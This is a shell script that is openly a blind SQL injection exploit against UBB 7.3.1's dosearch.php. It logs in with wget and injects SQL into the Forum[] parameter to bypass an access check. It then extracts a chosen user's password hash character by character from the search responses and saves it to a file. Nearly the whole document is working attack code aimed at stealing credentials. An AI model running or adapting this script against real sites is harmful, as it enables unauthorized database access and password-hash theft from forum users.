#!/bin/sh
#
# UBB 7.3.1 dosearch.php blind SQL injection brute force attack
#

hex=(A B C D E F 0 1 2 3 4 5 6 7 8 9)
main='http://[removed]/ubbthreads/ubbthreads.php'
login='ubb=start_page&Loginname=[removed]&Loginpass=[removed]&firstlogin=1&from=http%3A%2F%2F[removed]%2Fubbthreads%2Fubbthreads.php%3Fubb%3Ddosearch%26amp%3Bfromsearch%3D1%26amp%3BWords%3Dmove%26amp%3BForum%5B%5D%3Df2%2527%29%29%2Band%2B1%253D1%2F*&buttlogin=Log+In'
base="$main?ubb=dosearch&fromsearch=1&Words=body"
inject="&Forum[]=f2')) AND (SELECT 1 FROM w3t_USERS WHERE USER_ID%3D3 AND UPPER(USER_PASSWORD) LIKE 'R%')%3D1/*"

hash=()

replace(){
	echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1$2%'/"
}

push(){
	echo $1 | sed "s/LIKE '\(_*\)\(.*\)%'/LIKE '\1_$2%'/"
}

brute(){
	for char in ${hex[*]}; do
		#replace string
		inj=`replace "$inject" $char`
		#inject
		wget -O ubb --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt "$base$inj"
		#if match then return characters to hash array
		if [ -z `cat ubb | grep "There are no results"` ]; then
			hash+=($char)
			return
		fi
		rm ubb
	done
}

# INIT

#get PHPSESSID cookie
wget -O /dev/null --keep-session-cookies --save-cookies cookies.txt $main
#login & get UBB cookies & inject SQL to bypass dosearch.inc.php access restriction
wget -O /dev/null --load-cookies cookies.txt --keep-session-cookies --save-cookies cookies.txt --post-data=$login $main
#blind SQL injection brute force attack
for ((i=0; i<32;i++)); do
	brute
	inject=`push "$inject" "R"`
done
#clean
rm cookies.txt
#print the hash
printf "%s" "${hash[@]}" >> hash.txt